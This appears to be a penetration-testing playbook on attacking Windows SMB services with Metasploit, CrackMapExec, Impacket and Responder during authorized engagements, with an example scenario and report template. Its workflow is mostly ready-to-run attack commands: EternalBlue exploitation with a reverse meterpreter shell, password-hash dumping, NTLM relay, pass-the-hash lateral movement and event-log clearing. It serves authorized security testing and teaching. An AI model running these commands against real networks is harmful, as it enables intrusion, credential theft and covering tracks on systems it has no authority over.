| name | exploiting-smb-vulnerabilities-with-metasploit |
| description | 'Identifies and exploits SMB protocol vulnerabilities using Metasploit Framework during authorized penetration tests to demonstrate risks from unpatched Windows systems, misconfigured shares, and weak authentication in enterprise networks. ' |
| domain | cybersecurity |
| subdomain | network-security |
| tags | - network-security - smb - metasploit - exploitation - eternalblue |
| version | '1.0' |
| author | mahipal |
| license | Apache-2.0 |
| nist_csf | - PR.IR-01 - DE.CM-01 - ID.AM-03 - PR.DS-02 |
Exploiting SMB Vulnerabilities with Metasploit
When to Use
- Testing Windows systems for critical SMB vulnerabilities (EternalBlue, EternalRomance, PrintNightmare) during authorized penetration tests
- Demonstrating lateral movement risks via SMB relay, pass-the-hash, and credential spraying
- Validating that patch management processes have addressed known SMB vulnerabilities
- Assessing SMB signing enforcement and share permission configurations across the domain
- Testing network segmentation by attempting SMB exploitation across VLAN boundaries
Do not use against systems without explicit written authorization, against production domain controllers without a maintenance window, or to deploy persistent backdoors beyond the scope of the assessment.
Prerequisites
- Metasploit Framework 6.x installed (
msfconsole --version)
- Authorized penetration test scope document listing target IP ranges and approved attack types
- Network access to target SMB services (TCP 445, TCP 139)
- CrackMapExec and Impacket tools installed for complementary SMB testing
- Valid test credentials or credential wordlists approved for the engagement
- Kali Linux or equivalent testing platform
Workflow
Step 1: Enumerate SMB Services and Versions
nmap -sS -p 445,139 --open -oA smb_hosts 10.10.0.0/24
nmap -sV -p 445 --script smb-os-discovery,smb-protocols -oA smb_enum 10.10.0.0/24
crackmapexec smb 10.10.0.0/24 --gen-relay-list smb_nosigning.txt
crackmapexec smb 10.10.0.0/24 --smb-signing
crackmapexec smb 10.10.0.0/24 -u '' -p '' --shares
Step 2: Scan for Known SMB Vulnerabilities
msfconsole -q
msf6> use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(smb_ms17_010)> set RHOSTS file:smb_hosts.txt
msf6 auxiliary(smb_ms17_010)> set THREADS 10
msf6 auxiliary(smb_ms17_010)> run
msf6> use auxiliary/scanner/smb/ms08_067_check
msf6 auxiliary(ms08_067_check)> set RHOSTS file:smb_hosts.txt
msf6 auxiliary(ms08_067_check)> run
nmap -p 445 --script smb-vuln-cve-2020-0796 10.10.0.0/24
crackmapexec smb 10.10.0.0/24 -u testuser -p 'TestPass123' -M printnightmare
Step 3: Exploit EternalBlue (MS17-010)
msf6> use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue)> set RHOSTS 10.10.5.23
msf6 exploit(ms17_010_eternalblue)> set LHOST 10.10.1.99
msf6 exploit(ms17_010_eternalblue)> set LPORT 4444
msf6 exploit(ms17_010_eternalblue)> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(ms17_010_eternalblue)> set MaxExploitAttempts 3
msf6 exploit(ms17_010_eternalblue)> exploit
meterpreter> getuid
meterpreter> sysinfo
meterpreter> ipconfig
meterpreter> hashdump
Step 4: Perform SMB Relay Attack
sudo impacket-ntlmrelayx -tf smb_nosigning.txt -smb2support -i
meterpreter> shell
C:\> net use \\10.10.1.99\share /user:DOMAIN\admin password
msf6> use exploit/windows/smb/smb_relay
msf6 exploit(smb_relay)> set SMBHOST 10.10.5.30
msf6 exploit(smb_relay)> set LHOST 10.10.1.99
msf6 exploit(smb_relay)> exploit
sudo responder -I eth0 -wrfv
Step 5: Pass-the-Hash and Lateral Movement via SMB
meterpreter> hashdump
crackmapexec smb 10.10.0.0/24 -u Administrator \
-H e19ccf75ee54e06b06a5907af13cef42 --shares
crackmapexec smb 10.10.5.30 -u Administrator \
-H e19ccf75ee54e06b06a5907af13cef42 -x "whoami && hostname"
impacket-psexec [email protected] \
-hashes aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42
msf6> use exploit/windows/smb/psexec
msf6 exploit(psexec)> set RHOSTS 10.10.5.30
msf6 exploit(psexec)> set SMBUser Administrator
msf6 exploit(psexec)> set SMBPass aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42
msf6 exploit(psexec)> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(psexec)> set LHOST 10.10.1.99
msf6 exploit(psexec)> exploit
Step 6: Document Findings and Clean Up
meterpreter> screenshot
meterpreter> shell
C:\> net share
C:\> dir \\10.10.5.30\C$\Users\ /s /b
meterpreter> clearev
meterpreter> shell
C:\> del /f C:\Windows\Temp\payload.exe
msf6> sessions -K
crackmapexec smb 10.10.5.23 -u Administrator -H <hash> -x "dir C:\Windows\Temp\payload*"
Key Concepts
| Term | Definition |
|---|
| EternalBlue (MS17-010) | Critical SMB vulnerability in SMBv1 allowing remote code execution as SYSTEM without authentication, originally developed by the NSA and leaked by Shadow Brokers |
| SMB Signing | Cryptographic signing of SMB packets to prevent tampering and relay attacks; when disabled, attackers can relay NTLM authentication to other SMB hosts |
| Pass-the-Hash | Authentication technique using captured NTLM password hashes directly instead of plaintext passwords, bypassing the need to crack the hash |
| NTLM Relay | Attack where captured NTLM authentication is forwarded to a different server in real-time, granting the attacker access as the relayed user |
| PsExec | Remote execution technique that uploads a service binary to the ADMIN$ share and creates a Windows service to execute commands as SYSTEM |
| Null Session | Anonymous SMB connection (empty username and password) that may expose share listings, user enumeration, and policy information on misconfigured systems |
Tools & Systems
- Metasploit Framework: Exploitation framework with dedicated SMB scanner, exploit, and post-exploitation modules for comprehensive SMB testing
- CrackMapExec: Swiss-army knife for SMB enumeration, credential testing, share enumeration, and command execution across Windows networks
- Impacket: Python library providing psexec, smbclient, ntlmrelayx, and other tools for low-level SMB protocol interaction
- Responder: LLMNR/NBT-NS/mDNS poisoner that captures NTLM hashes from Windows name resolution fallback behavior
- enum4linux-ng: Updated SMB enumeration tool for extracting users, groups, shares, and policies from Windows/Samba hosts
Common Scenarios
Scenario: Internal Penetration Test Targeting Windows Domain via SMB
Context: During an internal penetration test for a financial services firm, the tester has network access to the corporate VLAN (10.10.0.0/16). The scope includes testing all Windows servers and workstations for SMB-related vulnerabilities. Active Directory domain is CORP.EXAMPLE.COM with approximately 200 hosts.
Approach:
- Scan the entire /16 for open SMB ports and enumerate OS versions with CrackMapExec
- Identify 12 hosts running Windows Server 2012 R2 without MS17-010 patch applied
- Exploit EternalBlue on a non-critical file server (10.10.5.23) to gain SYSTEM access
- Extract local administrator password hash using hashdump and discover password reuse across 47 hosts
- Use pass-the-hash to access a domain controller, extracting the NTDS.dit database
- Demonstrate that SMB signing is disabled on 83% of hosts, enabling relay attacks
- Document the complete attack chain showing how one unpatched system led to full domain compromise
Pitfalls:
- EternalBlue exploit can cause a blue screen of death (BSOD) on the target, especially on older or unstable systems
- Running psexec on heavily monitored endpoints may trigger EDR alerts and burn the engagement
- Performing hashdump on domain controllers with large databases can cause performance degradation
- Not checking for SMBv1 explicitly -- some scanners may miss it if SMBv2/v3 is also available
Output Format
## SMB Vulnerability Assessment Report
**Engagement**: Internal Penetration Test
**Target Range**: 10.10.0.0/16 (CORP.EXAMPLE.COM)
**SMB Hosts Discovered**: 187
### Critical Findings
**Finding 1: MS17-010 (EternalBlue) - 12 Unpatched Hosts**
- Severity: Critical (CVSS 9.8)
- Affected: 10.10.5.23, 10.10.5.24, 10.10.8.10 (+ 9 others)
- Impact: Remote code execution as SYSTEM without authentication
- Exploited: Yes - gained SYSTEM on 10.10.5.23
- Remediation: Apply MS17-010 patch, disable SMBv1
**Finding 2: SMB Signing Disabled - 155/187 Hosts**
- Severity: High (CVSS 7.5)
- Impact: NTLM relay attacks allow credential forwarding
- Exploited: Yes - relayed domain admin credentials
- Remediation: Enable SMB signing via Group Policy
**Finding 3: Local Admin Password Reuse - 47 Hosts**
- Severity: High (CVSS 7.2)
- Impact: Compromise of one host enables lateral movement to 47 systems
- Remediation: Deploy LAPS (Local Administrator Password Solution)
